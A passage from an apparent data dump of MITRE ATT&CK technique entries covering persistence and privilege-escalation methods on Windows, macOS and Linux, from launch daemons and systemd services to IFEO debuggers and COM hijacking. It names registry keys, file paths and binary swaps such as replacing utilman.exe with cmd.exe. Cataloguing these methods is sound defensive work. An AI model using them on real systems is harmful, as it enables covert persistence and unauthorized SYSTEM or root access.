                          'initialization and load user specific parameters.(Citation: AppleDocs Launch Agent '
                          'Daemons) \n'
                          '\n'
                          'Adversaries may install new services, daemons, or agents that can be configured to execute '
                          'at startup or a repeatable interval in order to establish persistence. Similarly, '
                          'adversaries may modify existing services, daemons, or agents to achieve the same effect.  \n'
                          '\n'
                          'Services, daemons, or agents may be created with administrator privileges but executed '
                          'under root/SYSTEM privileges. Adversaries may leverage this functionality to create or '
                          'modify system processes in order to escalate privileges. (Citation: OSX Malware '
                          'Detection).  ',
           'name': 'Create or Modify System Process',
           'platforms': ['Windows', 'macOS', 'Linux']},
 'T1543.001': {'attack_id': 'T1543.001',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may create or modify launch agents to repeatedly execute malicious payloads '
                              'as part of persistence. Per Apple’s developer documentation, when a user logs in, a '
                              'per-user launchd process is started which loads the parameters for each '
                              'launch-on-demand user agent from the property list (plist) files found in '
                              '<code>/System/Library/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, and '
                              '<code>$HOME/Library/LaunchAgents</code> (Citation: AppleDocs Launch Agent Daemons) '
                              '(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). These launch agents '
                              'have property list files which point to the executables that will be launched '
                              '(Citation: OSX.Dok Malware).\n'
                              ' \n'
                              'Adversaries may install a new launch agent that can be configured to execute at login '
                              'by using launchd or launchctl to load a plist into the appropriate directories  '
                              '(Citation: Sofacy Komplex Trojan)  (Citation: Methods of Mac Malware Persistence). The '
                              'agent name may be disguised by using a name from a related operating system or benign '
                              'software. Launch Agents are created with user level privileges and are executed with '
                              'the privileges of the user when they log in (Citation: OSX Malware Detection) '
                              '(Citation: OceanLotus for OS X). They can be set up to execute when a specific user '
                              'logs in (in the specific user’s directory structure) or when any user logs in (which '
                              'requires administrator privileges).',
               'name': 'Launch Agent',
               'platforms': ['macOS']},
 'T1543.002': {'attack_id': 'T1543.002',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may create or modify systemd services to repeatedly execute malicious '
                              'payloads as part of persistence. The systemd service manager is commonly used for '
                              'managing background daemon processes (also known as services) and other system '
                              'resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org '
                              'Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many '
                              'Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, '
                              'and replaces legacy init systems including SysVinit and Upstart while remaining '
                              'backwards compatible with the aforementioned init systems.\n'
                              '\n'
                              'Systemd utilizes configuration files known as service units to control how services '
                              'boot and under what conditions. By default, these unit files are stored in the '
                              '<code>/etc/systemd/system</code> and <code>/usr/lib/systemd/system</code> directories '
                              'and have the file extension <code>.service</code>. Each service unit file may contain '
                              'numerous directives that can execute system commands:\n'
                              '\n'
                              '* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands '
                              "when a services is started manually by 'systemctl' or on system start if the service is "
                              'set to automatically start. \n'
                              '* ExecReload directive covers when a service restarts. \n'
                              '* ExecStop and ExecStopPost directives cover when a service is stopped or manually by '
                              "'systemctl'.\n"
                              '\n'
                              'Adversaries have used systemd functionality to establish persistent access to victim '
                              'systems by creating and/or modifying service unit files that cause systemd to execute '
                              'malicious commands at system boot.(Citation: Anomali Rocke March 2019)\n'
                              '\n'
                              'While adversaries typically require root privileges to create/modify service unit files '
                              'in the <code>/etc/systemd/system</code> and <code>/usr/lib/systemd/system</code> '
                              'directories, low privilege users can create/modify service unit files in directories '
                              'such as <code>~/.config/systemd/user/</code> to achieve user-level '
                              'persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)',
               'name': 'Systemd Service',
               'platforms': ['Linux']},
 'T1543.003': {'attack_id': 'T1543.003',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may create or modify Windows services to repeatedly execute malicious '
                              'payloads as part of persistence. When Windows boots up, it starts programs or '
                              'applications called services that perform background system functions.(Citation: '
                              'TechNet Services) Windows service configuration information, including the file path to '
                              "the service's executable or recovery programs/commands, is stored in the Windows "
                              'Registry. Service configurations can be modified using utilities such as sc.exe and '
                              '[Reg](https://attack.mitre.org/software/S0075). \n'
                              '\n'
                              'Adversaries may install a new service or modify an existing service by using system '
                              'utilities to interact with services, by directly modifying the Registry, or by using '
                              'custom tools to interact with the Windows API. Adversaries may configure services to '
                              'execute at startup in order to persist on a system.\n'
                              '\n'
                              'An adversary may also incorporate '
                              '[Masquerading](https://attack.mitre.org/techniques/T1036) by using a service name from '
                              'a related operating system or benign software, or by modifying existing services to '
                              'make detection analysis more challenging. Modifying existing services may interrupt '
                              'their functionality or may enable services that are disabled or otherwise not commonly '
                              'used. \n'
                              '\n'
                              'Services may be created with administrator privileges but are executed under SYSTEM '
                              'privileges, so an adversary may also use a service to escalate privileges from '
                              'administrator to SYSTEM. Adversaries may also directly start services through [Service '
                              'Execution](https://attack.mitre.org/techniques/T1569/002). ',
               'name': 'Windows Service',
               'platforms': ['Windows']},
 'T1543.004': {'attack_id': 'T1543.004',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may create or modify launch daemons to repeatedly execute malicious '
                              'payloads as part of persistence. Per Apple’s developer documentation, when macOS and OS '
                              'X boot up, launchd is run to finish system initialization. This process loads the '
                              'parameters for each launch-on-demand system-level daemon from the property list (plist) '
                              'files found in <code>/System/Library/LaunchDaemons</code> and '
                              '<code>/Library/LaunchDaemons</code> (Citation: AppleDocs Launch Agent Daemons). These '
                              'LaunchDaemons have property list files which point to the executables that will be '
                              'launched (Citation: Methods of Mac Malware Persistence). \n'
                              '\n'
                              'Adversaries may install a new launch daemon that can be configured to execute at '
                              'startup by using launchd or launchctl to load a plist into the appropriate directories  '
                              '(Citation: OSX Malware Detection). The daemon name may be disguised by using a name '
                              'from a related operating system or benign software (Citation: WireLurker). Launch '
                              'Daemons may be created with administrator privileges, but are executed under root '
                              'privileges, so an adversary may also use a service to escalate privileges from '
                              'administrator to root. \n'
                              '\n'
                              'The plist file permissions must be root:wheel, but the script or program that it points '
                              'to has no such requirement. So, it is possible for poor configurations to allow an '
                              'adversary to modify a current Launch Daemon’s executable and gain persistence or '
                              'Privilege Escalation. ',
               'name': 'Launch Daemon',
               'platforms': ['macOS']},
 'T1544': {'attack_id': 'T1544',
           'categories': ['command-and-control'],
           'description': 'Files may be copied from one system to another to stage adversary tools or other files over '
                          'the course of an operation. Files may be copied from an external adversary-controlled '
                          'system through the Command and Control channel to bring tools into the victim network or '
                          'onto the victim’s device.',
           'name': 'Remote File Copy',
           'platforms': ['Android', 'iOS']},
 'T1546': {'attack_id': 'T1546',
           'categories': ['privilege-escalation', 'persistence'],
           'description': 'Adversaries may establish persistence and/or elevate privileges using system mechanisms '
                          'that trigger execution based on specific events. Various operating systems have means to '
                          'monitor and subscribe to events such as logons or other user activity such as running '
                          'specific applications/binaries. \n'
                          '\n'
                          'Adversaries may abuse these mechanisms as a means of maintaining persistent access to a '
                          'victim via repeatedly executing malicious code. After gaining access to a victim system, '
                          'adversaries may create/modify event triggers to point to malicious content that will be '
                          'executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: '
                          'Malware Persistence on OS X)(Citation: amnesia malware)\n'
                          '\n'
                          'Since the execution can be proxied by an account with higher permissions, such as SYSTEM or '
                          'service accounts, an adversary may be able to abuse these triggered execution mechanisms to '
                          'escalate their privileges. ',
           'name': 'Event Triggered Execution',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1546.001': {'attack_id': 'T1546.001',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence by executing malicious content triggered by a '
                              'file type association. When a file is opened, the default program used to open the file '
                              '(also called the file association or handler) is checked. File association selections '
                              'are stored in the Windows Registry and can be edited by users, administrators, or '
                              'programs that have Registry access (Citation: Microsoft Change Default Programs) '
                              '(Citation: Microsoft File Handlers) or by administrators using the built-in assoc '
                              'utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file '
                              'association for a given file extension to call an arbitrary program when a file with '
                              'the given extension is opened.\n'
                              '\n'
                              'System file associations are listed under <code>HKEY_CLASSES_ROOT\\.[extension]</code>, '
                              'for example <code>HKEY_CLASSES_ROOT\\.txt</code>. The entries point to a handler for '
                              'that extension located at <code>HKEY_CLASSES_ROOT\\[handler]</code>. The various '
                              'commands are then listed as subkeys underneath the shell key at '
                              '<code>HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command</code>. For example: \n'
                              '* <code>HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command</code>\n'
                              '* <code>HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command</code>\n'
                              '* <code>HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command</code>\n'
                              '\n'
                              'The values of the keys listed are commands that are executed when the handler opens the '
                              'file extension. Adversaries can modify these values to continually execute arbitrary '
                              'commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)',
               'name': 'Change Default File Association',
               'platforms': ['Windows']},
 'T1546.002': {'attack_id': 'T1546.002',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence by executing malicious content triggered by user '
                              'inactivity. Screensavers are programs that execute after a configurable time of user '
                              'inactivity and consist of Portable Executable (PE) files with a .scr file '
                              'extension.(Citation: Wikipedia Screensaver) The Windows screensaver application '
                              'scrnsave.scr is located in <code>C:\\Windows\\System32\\</code>, and '
                              '<code>C:\\Windows\\sysWOW64\\</code>  on 64-bit Windows systems, along with '
                              'screensavers included with base Windows installations.\n'
                              '\n'
                              'The following screensaver settings are stored in the Registry (<code>HKCU\\Control '
                              'Panel\\Desktop\\</code>) and could be manipulated to achieve persistence:\n'
                              '\n'
                              '* <code>SCRNSAVE.exe</code> - set to malicious PE path\n'
                              "* <code>ScreenSaveActive</code> - set to '1' to enable the screensaver\n"
                              "* <code>ScreenSaverIsSecure</code> - set to '0' to not require a password to unlock\n"
                              '* <code>ScreenSaveTimeout</code> - sets user inactivity timeout before screensaver is '
                              'executed\n'
                              '\n'
                              'Adversaries can use screensaver settings to maintain persistence by setting the '
                              'screensaver to run malware after a certain timeframe of user inactivity. (Citation: '
                              'ESET Gazer Aug 2017)',
               'name': 'Screensaver',
               'platforms': ['Windows']},
 'T1546.003': {'attack_id': 'T1546.003',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence and elevate privileges by executing malicious '
                              'content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI '
                              'can be used to install event filters, providers, consumers, and bindings that execute '
                              'code when a defined event occurs. Examples of events that may be subscribed to are the '
                              "wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends "
                              '2015)\n'
                              '\n'
                              'Adversaries may use the capabilities of WMI to subscribe to an event and execute '
                              'arbitrary code when that event occurs, providing persistence on a system. (Citation: '
                              'FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI '
                              'scripts into Windows Management Object (MOF) files (.mof extension) that can be used to '
                              'create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft '
                              'MOF May 2018)\n'
                              '\n'
                              'WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) '
                              'and thus may result in elevated SYSTEM privileges.',
               'name': 'Windows Management Instrumentation Event Subscription',
               'platforms': ['Windows']},
 'T1546.004': {'attack_id': 'T1546.004',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence by executing malicious content triggered by a '
                              'user’s shell. <code>~/.bash_profile</code> and <code>~/.bashrc</code> are shell scripts '
                              "that contain shell commands. These files are executed in a user's context when a new "
                              'shell opens or when a user logs in so that their environment is set correctly.\n'
                              '\n'
                              '<code>~/.bash_profile</code> is executed for login shells and <code>~/.bashrc</code> is '
                              'executed for interactive non-login shells. This means that when a user logs in (via '
                              'username and password) to the console (either locally or remotely via something like '
                              'SSH), the <code>~/.bash_profile</code> script is executed before the initial command '
                              'prompt is returned to the user. After that, every time a new shell is opened, the '
                              '<code>~/.bashrc</code> script is executed. This allows users more fine-grained control '
                              'over when they want certain commands executed. These shell scripts are meant to be '
                              'written to by the local user to configure their own environment.\n'
                              '\n'
                              'The macOS Terminal.app is a little different in that it runs a login shell by default '
                              'each time a new terminal window is opened, thus calling <code>~/.bash_profile</code> '
                              'each time instead of <code>~/.bashrc</code>.\n'
                              '\n'
                              'Adversaries may abuse these shell scripts by inserting arbitrary shell commands that '
                              'may be used to execute other binaries to gain persistence. Every time the user logs in '
                              'or opens a new shell, the modified ~/.bash_profile and/or ~/.bashrc scripts will be '
                              'executed.(Citation: amnesia malware)',
               'name': '.bash_profile and .bashrc',
               'platforms': ['Linux', 'macOS']},
 'T1546.005': {'attack_id': 'T1546.005',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence by executing malicious content triggered by an '
                              'interrupt signal. The <code>trap</code> command allows programs and shells to specify '
                              'commands that will be executed upon receiving interrupt signals. A common situation is '
                              'a script allowing for graceful termination and handling of common keyboard interrupts '
                              'like <code>ctrl+c</code> and <code>ctrl+d</code>.\n'
                              '\n'
                              'Adversaries can use this to register code to be executed when the shell encounters '
                              'specific interrupts as a persistence mechanism. Trap commands are of the following '
                              'format <code>trap \'command list\' signals</code> where "command list" will be executed '
                              'when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap '
                              'Statements)',
               'name': 'Trap',
               'platforms': ['macOS', 'Linux']},
 'T1546.006': {'attack_id': 'T1546.006',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence by executing malicious content triggered by the '
                              'execution of tainted binaries. Mach-O binaries have a series of headers that are used '
                              'to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a '
                              'Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during '
                              'execution time. These can be added ad-hoc to the compiled binary as long as adjustments '
                              'are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for '
                              'OSX) There are tools available to perform these changes.\n'
                              '\n'
                              'Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every '
                              'time the binary is executed. Although any changes will invalidate digital signatures on '
                              'binaries because the binary is being modified, this can be remediated by simply '
                              'removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t '
                              'checked at load time. (Citation: Malware Persistence on OS X)',
               'name': 'LC_LOAD_DYLIB Addition',
               'platforms': ['macOS']},
 'T1546.007': {'attack_id': 'T1546.007',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence by executing malicious content triggered by Netsh '
                              'Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting '
                              'utility used to interact with the network configuration of a system. It contains '
                              'functionality to add helper DLLs for extending functionality of the utility. (Citation: '
                              'TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the '
                              'Windows Registry at <code>HKLM\\SOFTWARE\\Microsoft\\Netsh</code>.\n'
                              '\n'
                              'Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a '
                              'persistent manner. This execution would take place anytime netsh.exe is executed, which '
                              'could happen automatically, with another persistence technique, or if other software '
                              '(ex: VPN) is present on the system that executes netsh.exe as part of its normal '
                              'functionality. (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh '
                              'Persistence)',
               'name': 'Netsh Helper DLL',
               'platforms': ['Windows']},
 'T1546.008': {'attack_id': 'T1546.008',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence and/or elevate privileges by executing malicious '
                              'content triggered by accessibility features. Windows contains accessibility features '
                              'that may be launched with a key combination before a user has logged in (ex: when the '
                              'user is on the Windows logon screen). An adversary can modify the way these programs '
                              'are launched to get a command prompt or backdoor without logging in to the system.\n'
                              '\n'
                              'Two common accessibility programs are <code>C:\\Windows\\System32\\sethc.exe</code>, '
                              'launched when the shift key is pressed five times and '
                              '<code>C:\\Windows\\System32\\utilman.exe</code>, launched when the Windows + U key '
                              'combination is pressed. The sethc.exe program is often referred to as "sticky keys", '
                              'and has been used by adversaries for unauthenticated access through a remote desktop '
                              'login screen. (Citation: FireEye Hikit Rootkit)\n'
                              '\n'
                              'Depending on the version of Windows, an adversary may take advantage of these features '
                              'in different ways. Common methods used by adversaries include replacing accessibility '
                              'feature binaries or pointers/references to these binaries in the Registry. In newer '
                              'versions of Windows, the replaced binary needs to be digitally signed for x64 systems, '
                              'the binary must reside in <code>%systemdir%\\</code>, and it must be protected by '
                              'Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The '
                              '[Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) '
                              'debugger method was likely discovered as a potential workaround because it does not '
                              'require the corresponding accessibility feature binary to be replaced.\n'
                              '\n'
                              'For simple binary replacement on Windows XP and later as well as and Windows Server '
                              '2003/R2 and later, for example, the program (e.g., '
                              '<code>C:\\Windows\\System32\\utilman.exe</code>) may be replaced with "cmd.exe" (or '
                              'another program that provides backdoor access). Subsequently, pressing the appropriate '
                              'key combination at the login screen while sitting at the keyboard or when connected '
                              'over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will '
                              'cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury '
                              '2014)\n'
                              '\n'
                              'Other accessibility features exist that may also be leveraged in a similar fashion: '
                              '(Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)\n'
                              '\n'
                              '* On-Screen Keyboard: <code>C:\\Windows\\System32\\osk.exe</code>\n'
                              '* Magnifier: <code>C:\\Windows\\System32\\Magnify.exe</code>\n'
                              '* Narrator: <code>C:\\Windows\\System32\\Narrator.exe</code>\n'
                              '* Display Switcher: <code>C:\\Windows\\System32\\DisplaySwitch.exe</code>\n'
                              '* App Switcher: <code>C:\\Windows\\System32\\AtBroker.exe</code>',
               'name': 'Accessibility Features',
               'platforms': ['Windows']},
 'T1546.009': {'attack_id': 'T1546.009',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence and/or elevate privileges by executing malicious '
                              'content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) '
                              'that are specified in the <code>AppCertDLLs</code> Registry key under '
                              '<code>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\</code> '
                              'are loaded into every process that calls the ubiquitously used application programming '
                              'interface (API) functions <code>CreateProcess</code>, <code>CreateProcessAsUser</code>, '
                              '<code>CreateProcessWithLoginW</code>, <code>CreateProcessWithTokenW</code>, or '
                              '<code>WinExec</code>. (Citation: Endgame Process Injection July 2017)\n'
                              '\n'
                              'Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value '
                              'can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and '
                              'run in the context of separate processes on the computer. Malicious AppCert DLLs may '
                              'also provide persistence by continuously being triggered by API activity. ',
               'name': 'AppCert DLLs',
               'platforms': ['Windows']},
 'T1546.010': {'attack_id': 'T1546.010',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence and/or elevate privileges by executing malicious '
                              'content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) '
                              'that are specified in the <code>AppInit_DLLs</code> value in the Registry keys '
                              '<code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows '
                              'NT\\CurrentVersion\\Windows</code> or '
                              '<code>HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows '
                              'NT\\CurrentVersion\\Windows</code> are loaded by user32.dll into every process that '
                              'loads user32.dll. In practice this is nearly every program, since user32.dll is a very '
                              'common library. (Citation: Endgame Process Injection July 2017)\n'
                              '\n'
                              'Similar to Process Injection, these values can be abused to obtain elevated privileges '
                              'by causing a malicious DLL to be loaded and run in the context of separate processes on '
                              'the computer. (Citation: AppInit Registry) Malicious AppInit DLLs may also provide '
                              'persistence by continuously being triggered by API activity. \n'
                              '\n'
                              'The AppInit DLL functionality is disabled in Windows 8 and later versions when secure '
                              'boot is enabled. (Citation: AppInit Secure Boot)',
               'name': 'AppInit DLLs',
               'platforms': ['Windows']},
 'T1546.011': {'attack_id': 'T1546.011',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence and/or elevate privileges by executing malicious '
                              'content triggered by application shims. The Microsoft Windows Application Compatibility '
                              'Infrastructure/Framework (Application Shim) was created to allow for backward '
                              'compatibility of software as the operating system codebase changes over time. For '
                              'example, the application shimming feature allows developers to apply fixes to '
                              'applications (without rewriting code) that were created for Windows XP so that it will '
                              'work with Windows 10. (Citation: Endgame Process Injection July 2017)\n'
                              '\n'
                              'Within the framework, shims are created to act as a buffer between the program (or more '
                              'specifically, the Import Address Table) and the Windows OS. When a program is executed, '
                              'the shim cache is referenced to determine if the program requires the use of the shim '
                              'database (.sdb). If so, the shim database uses hooking to redirect the code as '
                              'necessary in order to communicate with the OS. \n'
                              '\n'
                              'A list of all shims currently installed by the default Windows installer (sdbinst.exe) '
                              'is kept in:\n'
                              '\n'
                              '* <code>%WINDIR%\\AppPatch\\sysmain.sdb</code> and\n'
                              '* <code>hklm\\software\\microsoft\\windows '
                              'nt\\currentversion\\appcompatflags\\installedsdb</code>\n'
                              '\n'
                              'Custom databases are stored in:\n'
                              '\n'
                              '* <code>%WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom</code> and\n'
                              '* <code>hklm\\software\\microsoft\\windows '
                              'nt\\currentversion\\appcompatflags\\custom</code>\n'
                              '\n'
                              'To keep shims secure, Windows designed them to run in user mode so they cannot modify '
                              'the kernel and you must have administrator privileges to install a shim. However, '
                              'certain shims can be used to [Bypass User Account '
                              'Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject '
                              'DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and '
                              'Structure Exception Handling (DisableSEH), and intercept memory addresses '
                              '(GetProcAddress).\n'
                              '\n'
                              'Utilizing these shims may allow an adversary to perform several malicious acts such as '
                              'elevate privileges, install backdoors, disable defenses like Windows Defender, etc. '
                              '(Citation: FireEye Application Shimming) Shims can also be abused to establish '
                              'persistence by continuously being invoked by affected programs.',
               'name': 'Application Shimming',
               'platforms': ['Windows']},
 'T1546.012': {'attack_id': 'T1546.012',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence and/or elevate privileges by executing malicious '
                              'content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a '
                              'developer to attach a debugger to an application. When a process is created, a debugger '
                              'present in an application’s IFEO will be prepended to the application’s name, '
                              'effectively launching the new process under the debugger (e.g., <code>C:\\dbg\\ntsd.exe '
                              '-g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)\n'
                              '\n'
                              'IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. '
                              '(Citation: Microsoft GFlags Mar 2017) IFEOs are represented as <code>Debugger</code> '
                              'values in the Registry under <code>HKLM\\SOFTWARE{\\Wow6432Node}\\Microsoft\\Windows '
                              'NT\\CurrentVersion\\Image File Execution Options\\<executable></code> where '
                              '<code>&lt;executable&gt;</code> is the binary on which the debugger is attached. '
                              '(Citation: Microsoft Dev Blog IFEO Mar 2010)\n'
                              '\n'
                              'IFEOs can also enable an arbitrary monitor program to be launched when a specified '
                              'program silently exits (i.e. is prematurely terminated by itself or a second, non '
                              'kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: '
                              'Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled '
                              'through GFlags and/or by directly modifying IFEO and silent process exit Registry '
                              'values in <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows '
                              'NT\\CurrentVersion\\SilentProcessExit\\</code>. (Citation: Microsoft Silent Process '
                              'Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)\n'
                              '\n'
                              'Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on '
                              'Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be '
                              'modified that configures "cmd.exe," or another program that provides backdoor access, '
                              'as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is '
                              'modified, pressing the appropriate key combination at the login screen while at the '
                              'keyboard or when connected with [Remote Desktop '
                              'Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" '
                              'program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n'
                              '\n'
                              'Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values '
                              'may also be abused to obtain privilege escalation by causing a malicious executable to '
                              'be loaded and run in the context of separate processes on the computer. (Citation: '
                              'Endgame Process Injection July 2017) Installing IFEO mechanisms may also provide '
                              'Persistence via continuous triggered invocation.\n'
                              '\n'
                              'Malware may also use IFEO to [Impair '
                              'Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers '
                              'that redirect and effectively disable various system and security applications. '
                              '(Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)',
               'name': 'Image File Execution Options Injection',
               'platforms': ['Windows']},
 'T1546.013': {'attack_id': 'T1546.013',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may gain persistence and elevate privileges by executing malicious content '
                              'triggered by PowerShell profiles. A PowerShell profile  (<code>profile.ps1</code>) is a '
                              'script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) '
                              'starts and can be used as a logon script to customize user environments.\n'
                              '\n'
                              '[PowerShell](https://attack.mitre.org/techniques/T1059/001) supports several profiles '
                              'depending on the user or host program. For example, there can be different profiles for '
                              '[PowerShell](https://attack.mitre.org/techniques/T1059/001) host programs such as the '
                              'PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also '
                              'configure a profile that applies to all users and host programs on the local computer. '
                              '(Citation: Microsoft About Profiles) \n'
                              '\n'
                              'Adversaries may modify these profiles to include arbitrary commands, functions, '
                              'modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) drives to '
                              'gain persistence. Every time a user opens a '
                              '[PowerShell](https://attack.mitre.org/techniques/T1059/001) session the modified script '
                              'will be executed unless the <code>-NoProfile</code> flag is used when it is launched. '
                              '(Citation: ESET Turla PowerShell May 2019) \n'
                              '\n'
                              'An adversary may also be able to escalate privileges if a script in a PowerShell '
                              'profile is loaded and executed by an account with higher privileges, such as a domain '
                              'administrator. (Citation: Wits End and Shady PowerShell Profiles)',
               'name': 'PowerShell Profile',
               'platforms': ['Windows']},
 'T1546.014': {'attack_id': 'T1546.014',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may gain persistence and elevate privileges by executing malicious content '
                              'triggered by the Event Monitor Daemon (emond). Emond is a [Launch '
                              'Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various '
                              'services, runs them through a simple rules engine, and takes action. The emond binary '
                              'at <code>/sbin/emond</code> will load any rules from the '
                              '<code>/etc/emond.d/rules/</code> directory and take action once an explicitly defined '
                              'event takes place.\n'
                              '\n'
                              'The rule files are in the plist format and define the name, event type, and action to '
                              'take. Some examples of event types include system startup and user authentication. '
                              'Examples of actions are to run a system command or send an email. The emond service '
                              'will not launch if there is no file present in the QueueDirectories path '
                              '<code>/private/var/db/emondClients</code>, specified in the [Launch '
                              'Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file '
                              'at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior '
                              'emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos '
                              'persist Jun 2019)\n'
                              '\n'
                              'Adversaries may abuse this service by writing a rule to execute commands when a defined '
                              'event occurs, such as system start up or user authentication.(Citation: xorrior emond '
                              'Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun '
                              '2019) Adversaries may also be able to escalate privileges from administrator to root as '
                              'the emond service is executed with root privileges by the [Launch '
                              'Daemon](https://attack.mitre.org/techniques/T1543/004) service.',
               'name': 'Emond',
               'platforms': ['macOS']},
 'T1546.015': {'attack_id': 'T1546.015',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence by executing malicious content triggered by '
                              'hijacked references to Component Object Model (COM) objects. COM is a system within '
                              'Windows to enable interaction between software components through the operating '
                              'system.(Citation: Microsoft Component Object Model)  References to various COM objects '
                              'are stored in the Registry. \n'
                              '\n'
                              'Adversaries can use the COM system to insert malicious code that can be executed in '
                              'place of legitimate software through hijacking the COM references and relationships as '
                              'a means for persistence. Hijacking a COM object requires a change in the Registry to '
                              'replace a reference to a legitimate system component which may cause that component to '
                              'not work when executed. When that system component is executed through normal system '
                              "operation the adversary's code will be executed instead.(Citation: GDATA COM Hijacking) "
                              'An adversary is likely to hijack objects that are used frequently enough to maintain a '
                              'consistent level of persistence, but are unlikely to break noticeable functionality '
                              'within the system as to avoid system instability that could lead to detection. ',
               'name': 'Component Object Model Hijacking',
               'platforms': ['Windows']},
 'T1547': {'attack_id': 'T1547',
           'categories': ['persistence', 'privilege-escalation'],
           'description': 'Adversaries may configure system settings to automatically execute a program during system '
                          'boot or logon to maintain persistence or gain higher-level privileges on compromised '
                          'systems. Operating systems may have mechanisms for automatically running a program on '
                          'system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication '
                          'Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept '
                          '2013)(Citation: Linux Kernel Programming)\xa0 These mechanisms may include automatically '
                          'executing programs that are placed in specially designated directories or are referenced by '
                          'repositories that store configuration information, such as the Windows Registry. An '
                          'adversary may achieve the same goal by modifying or extending features of the kernel.\n'
                          '\n'
                          'Since some boot or logon autostart programs run with higher privileges, an adversary may '
                          'leverage these to elevate privileges.',
           'name': 'Boot or Logon Autostart Execution',
